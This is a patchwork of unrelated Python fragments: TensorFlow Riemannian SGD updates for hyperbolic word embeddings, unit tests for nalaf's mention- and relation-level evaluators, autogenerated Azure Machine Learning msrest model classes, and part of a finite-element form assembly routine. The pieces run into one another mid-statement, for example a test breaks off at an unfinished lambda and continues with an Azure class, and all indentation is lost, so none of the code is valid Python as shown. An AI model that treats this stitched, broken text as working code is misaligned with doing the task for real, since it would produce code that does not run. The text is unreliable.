all_updates_ops.append(optimizer_euclidean_params.apply_gradients(capped_eucl_gvs))
###### Update Hyperbolic parameters, i.e. word embeddings and some biases in our case.
def rsgd(v, riemannian_g, learning_rate):
if hyp_opt == 'rsgd':
return util.tf_exp_map_x(v, -self.burn_in_factor * learning_rate * riemannian_g, c=c_val)
else:
# Use approximate RSGD based on a simple retraction.
updated_v = v - self.burn_in_factor * learning_rate * riemannian_g
# Projection op after SGD update. Need to make sure embeddings are inside the unit ball.
return util.tf_project_hyp_vecs(updated_v, c_val)
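# The 'rsgd' branch is full Riemannian SGD (Bonnabel, 2013): follow the
# rescaled gradient along the exponential map, v <- exp_v(-lr * grad_R).
# The fallback is a cheaper first-order retraction, v <- proj(v - lr * grad_R),
# whose projection keeps the iterate inside the Poincare ball.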
if inputs_geom == 'hyp':
grads_and_indices_hyp_words = tf.gradients(self.loss, self.embeddings)
grads_hyp_words = grads_and_indices_hyp_words[0].values
repeating_indices = grads_and_indices_hyp_words[0].indices
unique_indices, idx_in_repeating_indices = tf.unique(repeating_indices)
agg_gradients = tf.unsorted_segment_sum(grads_hyp_words,
idx_in_repeating_indices,
tf.shape(unique_indices)[0])
agg_gradients = tf.clip_by_norm(agg_gradients, 1.) ######## Clip gradients
unique_word_emb = tf.nn.embedding_lookup(self.embeddings, unique_indices) # no repetitions here
riemannian_rescaling_factor = util.riemannian_gradient_c(unique_word_emb, c=c_val)
rescaled_gradient = riemannian_rescaling_factor * agg_gradients
all_updates_ops.append(tf.scatter_update(self.embeddings,
unique_indices,
rsgd(unique_word_emb, rescaled_gradient, lr_words))) # Updated rarely
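# Note: tf.gradients on an embedding lookup yields IndexedSlices, so the
# unique / unsorted_segment_sum pair above merges duplicate row gradients
# before rescaling by the Riemannian conformal factor and applying RSGD.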
if len(hyp_vars) > 0:
hyp_grads = tf.gradients(self.loss, hyp_vars)
capped_hyp_grads = [tf.clip_by_norm(grad, 1.) for grad in hyp_grads] ###### Clip gradients
for i in range(len(hyp_vars)):
riemannian_rescaling_factor = util.riemannian_gradient_c(hyp_vars[i], c=c_val)
rescaled_gradient = riemannian_rescaling_factor * capped_hyp_grads[i]
all_updates_ops.append(tf.assign(hyp_vars[i], rsgd(hyp_vars[i], rescaled_gradient, lr_ffnn)))
import unittest
from nalaf.structures.data import Dataset, Document, Part, Entity, Relation
from nalaf.learning.evaluators import Evaluator, MentionLevelEvaluator, DocumentLevelRelationEvaluator
from nalaf.preprocessing.spliters import NLTKSplitter
from nalaf.preprocessing.tokenizers import NLTK_TOKENIZER
STUB_E_ID_1 = 'e_x_1'
STUB_E_ID_2 = 'e_x_2'
STUB_R_ID_1 = 'r_x_1'
class TestEvaluators(unittest.TestCase):
@classmethod
def setUpClass(cls):
# create sample dataset 1 to test with
cls.dataset1 = Dataset()
doc_1 = Document()
text = '.... aaaa .... bbbb .... cccc .... dddd .... eeee .... ffff .... gggg .... hhhh .... jjjj'
part_1 = Part(text)
cls.dataset1.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
exact_1 = Entity(STUB_E_ID_1, 5, 'aaaa')
exact_1.subclass = 1
exact_2 = Entity(STUB_E_ID_1, 55, 'ffff')
exact_2.subclass = 2
exact_3 = Entity(STUB_E_ID_1, 75, 'hhhh')
exact_3.subclass = 2
overlap_1_1 = Entity(STUB_E_ID_1, 25, 'cccc')
overlap_1_1.subclass = 1
overlap_1_2 = Entity(STUB_E_ID_1, 26, 'cc')
overlap_1_2.subclass = 1
overlap_2_1 = Entity(STUB_E_ID_1, 32, '.. ddd')
overlap_2_1.subclass = 2
overlap_2_2 = Entity(STUB_E_ID_1, 36, 'ddd ...')
overlap_2_2.subclass = 2
overlap_3_1 = Entity(STUB_E_ID_1, 65, 'gggg')
overlap_3_1.subclass = 1
overlap_3_2 = Entity(STUB_E_ID_1, 62, '.. gggg ..')
overlap_3_2.subclass = 2
missing_1 = Entity('e2', 45, 'eeee')
missing_1.subclass = 1
missing_2 = Entity('e2', 84, 'jjjj')
missing_2.subclass = 1
spurious = Entity('e2', 15, 'bbbb')
spurious.subclass = 1
part_1.annotations = [exact_1, exact_2, exact_3, overlap_1_1, overlap_2_1, overlap_3_1, missing_1, missing_2]
part_1.predicted_annotations = [exact_1, exact_2, exact_3, overlap_1_2, overlap_2_2, overlap_3_2, spurious]
def test_implements_evaluator_interface(self):
self.assertIsInstance(MentionLevelEvaluator(), Evaluator)
def test_exact_strictness(self):
evaluator = MentionLevelEvaluator()
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL)
self.assertEqual(evaluation.tp, 3) # the 3 exact matches
self.assertEqual(evaluation.fp, 4) # the 3 overlapping + 1 spurious
self.assertEqual(evaluation.fn, 5) # the 3 overlapping + 2 missing
ret = evaluation.compute('exact')
self.assertEqual(ret.precision, 3 / 7)
self.assertEqual(ret.recall, 3 / 8)
self.assertEqual(ret.f_measure, 2 * (3 / 7 * 3 / 8) / (3 / 7 + 3 / 8))
def test_overlapping_strictness(self):
evaluator = MentionLevelEvaluator()
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL)
self.assertEqual(evaluation.tp, 3) # the 3 exact matches
self.assertEqual(evaluation.fp - evaluation.fp_ov, 1) # the 1 spurious
self.assertEqual(evaluation.fn - evaluation.fn_ov, 2) # the 2 missing
self.assertEqual(evaluation.fp_ov, 3) # the 3 overlapping
self.assertEqual(evaluation.fn_ov, 3) # the 3 overlapping
ret = evaluation.compute('overlapping')
self.assertEqual(ret.precision, 9 / 10)
self.assertEqual(ret.recall, 9 / 11)
self.assertAlmostEqual(ret.f_measure, 2 * (9 / 10 * 9 / 11) / (9 / 10 + 9 / 11), places=5)
def test_half_overlapping_strictness(self):
evaluator = MentionLevelEvaluator()
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL)
self.assertEqual(evaluation.tp, 3) # the 3 exact matches
self.assertEqual(evaluation.fp - evaluation.fp_ov, 1) # the 1 spurious
self.assertEqual(evaluation.fn - evaluation.fn_ov, 2) # the 2 missing
self.assertEqual(evaluation.fp_ov, 3) # the 3 overlapping
self.assertEqual(evaluation.fn_ov, 3) # the 3 overlapping
ret = evaluation.compute('half_overlapping')
self.assertEqual(ret.precision, (3 + 6 / 2) / 10)
self.assertEqual(ret.recall, (3 + 6 / 2) / 11)
self.assertEqual(ret.f_measure, 2 * ((3 + 6 / 2) / 10 * (3 + 6 / 2) / 11) / ((3 + 6 / 2) / 10 + (3 + 6 / 2) / 11))
def test_exception_on_equality_operator(self):
ann_1 = Entity(STUB_E_ID_1, 1, 'text_1')
ann_2 = Entity(STUB_E_ID_1, 2, 'text_2')
Entity.equality_operator = 'not valid'
self.assertRaises(ValueError, lambda: ann_1 == ann_2)
def test_exception_on_strictness(self):
evaluator = MentionLevelEvaluator() # this is fine
evaluation = (evaluator.evaluate(self.dataset1))(MentionLevelEvaluator.TOTAL_LABEL) # this is fine
self.assertRaises(ValueError, evaluation.compute, 'strictness not valid')
def test_subclass_analysis(self):
evaluator = MentionLevelEvaluator(subclass_analysis=True)
evaluations = evaluator.evaluate(self.dataset1)
self.assertEqual(evaluations(1).tp, 1)
self.assertEqual(evaluations(2).tp, 2)
self.assertEqual(evaluations(1).fp, 3)
self.assertEqual(evaluations(2).fp, 1)
self.assertEqual(evaluations(1).fn, 4)
self.assertEqual(evaluations(2).fn, 1)
self.assertEqual(evaluations(1).fp_ov, 2)
self.assertEqual(evaluations(1).fn_ov, 2)
self.assertEqual(evaluations(2).fp_ov, 1)
self.assertEqual(evaluations(2).fn_ov, 1)
# -------
def _apply_pipeline(self, dataset):
# Apply through pipeline
NLTKSplitter().split(dataset)
NLTK_TOKENIZER.tokenize(dataset)
# nlp = get_spacy_nlp_english(load_parser=False)
# cls.parser = SpacyParser(nlp)
# cls.parser.parse(cls.dataset)
return dataset
def test_DocumentLevelRelationEvaluator_default_entities_case_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "TOOL"),
Entity(STUB_E_ID_2, 0, "maynard")
),
]
# -
part_1.predicted_relations = [
# empty
]
self._apply_pipeline(dataset)
# -
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.0)
# ---
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "TOOL"),
Entity(STUB_E_ID_2, 0, "maynard")
),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
# -
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "tool"),
Entity(STUB_E_ID_2, 0, "MAYNARD")
),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_order_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "TOOL"),
Entity(STUB_E_ID_2, 0, "maynard")
),
]
# -
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_2, 0, "maynard"),
Entity(STUB_E_ID_1, 0, "TOOL")
),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_false_positives(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_ PART *1*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_2 = Part('_irrelevant_ PART *2*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_2'] = part_2
part_1.relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "Maynard")),
]
# -
part_2.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_2, 0, "TOOL"), Entity(STUB_E_ID_1, 0, "Snoop Dog")),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 0)
self.assertEqual(evaluation.fn, 1)
self.assertEqual(evaluation.fp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.0)
def test_DocumentLevelRelationEvaluator_parts_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_ PART *1*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_2 = Part('_irrelevant_ PART *2*')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_2'] = part_2
part_1.relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "maynard")),
]
# -
part_2.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_2, 0, "maynard"), Entity(STUB_E_ID_1, 0, "TOOL")),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_repeated_relations_irrelevant(self):
evaluator = DocumentLevelRelationEvaluator(rel_type=STUB_R_ID_1)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "<NAME>")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 1, "TOOL"), Entity(STUB_E_ID_2, 1, "<NAME>")),
]
# -
part_1.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "TOOL"), Entity(STUB_E_ID_2, 0, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 1, "TOOL"), Entity(STUB_E_ID_2, 1, "maynard")),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 1)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.6666666666666666)
# -
part_1.predicted_relations = [
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 2, "TOOL"), Entity(STUB_E_ID_2, 2, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 3, "TOOL"), Entity(STUB_E_ID_2, 3, "maynard")),
Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 4, "TOOL"), Entity(STUB_E_ID_2, 4, "<NAME>")),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 2)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_normalized_entities(self):
evaluator = DocumentLevelRelationEvaluator(
rel_type=STUB_R_ID_1,
entity_map_fun=DocumentLevelRelationEvaluator.COMMON_ENTITY_MAP_FUNS['normalized_fun'](
{STUB_E_ID_1: 'n_1', STUB_E_ID_2: 'n_1'},
penalize_unknown_normalizations="no")
)
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
part_1.relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_1": "1964"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_1": "1961"})),
]
# -
part_1.predicted_relations = [
Relation(
# One without normalization, one with another different normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool"),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_x": "1961"})),
Relation(
# One with different normalization, one with another different normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_1": "666"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_x": "1961"})),
Relation(
# Both with the correct normalization ids, but one has wrong normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_1": "666"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_1": "1961"})),
Relation(
# Both with another different normalization
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool", norms={"n_another_key": "1964"}),
Entity(STUB_E_ID_2, 0, "Maynard", norms={"n_another_key": "1961"})),
]
self._apply_pipeline(dataset)
# ---
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 0)
self.assertEqual(evaluation.fn, 1)
self.assertEqual(evaluation.fp, 1)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 0.0)
# -
part_1.predicted_relations = [
Relation(
STUB_R_ID_1,
Entity(STUB_E_ID_1, 0, "Tool band", norms={"n_1": "1964"}),
Entity(STUB_E_ID_2, 0, "<NAME>", norms={"n_1": "1961"})),
]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def _create_basic_dataset(self):
dataset = Dataset()
doc_1 = Document()
part_1 = Part('_irrelevant_')
dataset.documents['doc_1'] = doc_1
doc_1.parts['part_1'] = part_1
self._apply_pipeline(dataset)
return (dataset, part_1)
def test_DocumentLevelRelationEvaluator_arbitrary_relation_accept_fun_order_does_not_matter(self):
entity_map_fun = (lambda e: "SAME")
def relation_accept_fun(gold, pred):
print('gold:', gold, ' <---> ', 'pred:', pred)
return gold == pred
r1 = Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "yin"), Entity(STUB_E_ID_2, 0, "yan"))
r2 = Relation(STUB_R_ID_1, Entity(STUB_E_ID_1, 0, "yan"), Entity(STUB_E_ID_2, 0, "yin"))
self.assertTrue(relation_accept_fun(r1.map(entity_map_fun), r1.map(entity_map_fun)))
self.assertTrue(relation_accept_fun(r1.map(entity_map_fun), r2.map(entity_map_fun)))
self.assertTrue(relation_accept_fun(r2.map(entity_map_fun), r1.map(entity_map_fun)))
evaluator = DocumentLevelRelationEvaluator(STUB_R_ID_1, entity_map_fun, relation_accept_fun)
(dataset, part) = self._create_basic_dataset()
# -
part.relations = [r1]
part.predicted_relations = [r1]
evals = evaluator.evaluate(dataset)
evaluation = evals(STUB_R_ID_1)
print(evaluation)
self.assertEqual(evaluation.tp, 1)
self.assertEqual(evaluation.fn, 0)
self.assertEqual(evaluation.fp, 0)
computation = evals(STUB_R_ID_1).compute(strictness="exact")
self.assertEqual(computation.f_measure, 1.0)
def test_DocumentLevelRelationEvaluator_arbitrary_relation_accept_fun_order_matters(self):
entity_map_fun = (lambda
class Operation(msrest.serialization.Model):
"""Azure Machine Learning workspace REST API operation.
:param name: Operation name: {provider}/{resource}/{operation}.
:type name: str
:param display: Display name of operation.
:type display: ~azure.mgmt.machinelearningservices.models.OperationDisplay
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display: Optional["OperationDisplay"] = None,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
class OperationDisplay(msrest.serialization.Model):
"""Display name of operation.
:param provider: The resource provider name: Microsoft.MachineLearningExperimentation.
:type provider: str
:param resource: The resource on which the operation is performed.
:type resource: str
:param operation: The operation that users can perform.
:type operation: str
:param description: The description for the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class OperationListResult(msrest.serialization.Model):
"""An array of operations supported by the resource provider.
:param value: List of AML workspace operations supported by the AML workspace resource
provider.
:type value: list[~azure.mgmt.machinelearningservices.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
*,
value: Optional[List["Operation"]] = None,
**kwargs
):
super(OperationListResult, self).__init__(**kwargs)
self.value = value
class PaginatedComputeResourcesList(msrest.serialization.Model):
"""Paginated list of Machine Learning compute objects wrapped in ARM resource envelope.
:param value: An array of Machine Learning compute objects wrapped in ARM resource envelope.
:type value: list[~azure.mgmt.machinelearningservices.models.ComputeResource]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ComputeResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["ComputeResource"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedComputeResourcesList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class PaginatedWorkspaceConnectionsList(msrest.serialization.Model):
"""Paginated list of Workspace connection objects.
:param value: An array of Workspace connection objects.
:type value: list[~azure.mgmt.machinelearningservices.models.WorkspaceConnection]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkspaceConnection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["WorkspaceConnection"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedWorkspaceConnectionsList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class Password(msrest.serialization.Model):
"""Password.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name:
:vartype name: str
:ivar value:
:vartype value: str
"""
_validation = {
'name': {'readonly': True},
'value': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Password, self).__init__(**kwargs)
self.name = None
self.value = None
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(msrest.serialization.Model):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: ResourceId of the private endpoint connection.
:vartype id: str
:ivar name: Friendly name of the private endpoint connection.
:vartype name: str
:ivar type: Resource type of private endpoint connection.
:vartype type: str
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~azure.mgmt.machinelearningservices.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~azure.mgmt.machinelearningservices.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
*,
private_endpoint: Optional["PrivateEndpoint"] = None,
private_link_service_connection_state: Optional["PrivateLinkServiceConnectionState"] = None,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = None
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
required_zone_names: Optional[List[str]] = None,
**kwargs
):
super(PrivateLinkResource, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = required_zone_names
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~azure.mgmt.machinelearningservices.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
*,
value: Optional[List["PrivateLinkResource"]] = None,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = value
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected", "Disconnected",
"Timeout".
:type status: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[Union[str, "PrivateEndpointServiceConnectionStatus"]] = None,
description: Optional[str] = None,
actions_required: Optional[str] = None,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = status
self.description = description
self.actions_required = actions_required
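# Minimal usage sketch (hedged: the values are illustrative; the keyword-only
# constructors above define the accepted parameters):
#
#   state = PrivateLinkServiceConnectionState(
#       status="Approved", description="auto-approved by policy")
#   conn = PrivateEndpointConnection(
#       private_link_service_connection_state=state)
#
# Server-populated fields (id, name, type, provisioning_state) remain None
# until the model is deserialized from a service response.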
class QuotaBaseProperties(msrest.serialization.Model):
"""The properties for Quota update or retrieval.
:param id: Specifies the resource ID.
:type id: str
:param type: Specifies the resource type.
:type type: str
:param limit: The maximum permitted quota of the resource.
:type limit: long
:param unit: An enum describing the unit of quota measurement. Possible values include:
"Count".
:type unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
type: Optional[str] = None,
limit: Optional[int] = None,
unit: Optional[Union[str, "QuotaUnit"]] = None,
**kwargs
):
super(QuotaBaseProperties, self).__init__(**kwargs)
self.id = id
self.type = type
self.limit = limit
self.unit = unit
class QuotaUpdateParameters(msrest.serialization.Model):
"""Quota update parameters.
:param value: The list for update quota.
:type value: list[~azure.mgmt.machinelearningservices.models.QuotaBaseProperties]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[QuotaBaseProperties]'},
}
def __init__(
self,
*,
value: Optional[List["QuotaBaseProperties"]] = None,
**kwargs
):
super(QuotaUpdateParameters, self).__init__(**kwargs)
self.value = value
class RegistryListCredentialsResult(msrest.serialization.Model):
"""RegistryListCredentialsResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location:
:vartype location: str
:ivar username:
:vartype username: str
:param passwords:
:type passwords: list[~azure.mgmt.machinelearningservices.models.Password]
"""
_validation = {
'location': {'readonly': | |
necessary
if f_loc is None:
if n_samples is None:
f_loc = np.zeros(n_dofs_test)
else:
f_loc = np.zeros((n_dofs_test,n_samples))
# Update form
f_loc += np.dot(test.T, wKer)
elif self.type=='bilinear':
#
# Bilinear form
#
# Test functions evaluated at Gauss nodes
n_dofs_test = self.test.dofhandler().element.n_dofs()
test = phi[region][self.test]
# Trial functions evaluated at Gauss nodes
n_dofs_trial = self.trial.dofhandler().element.n_dofs()
trial = phi[region][self.trial]
#
# Initialize local matrix if necessary
#
if f_loc is None:
#
# Initialize form
#
if n_samples is None:
f_loc = np.zeros((n_dofs_test,n_dofs_trial))
else:
f_loc = np.zeros((n_dofs_test,n_dofs_trial,n_samples))
#
# Update form
#
if n_samples is None:
#
# Deterministic kernel
#
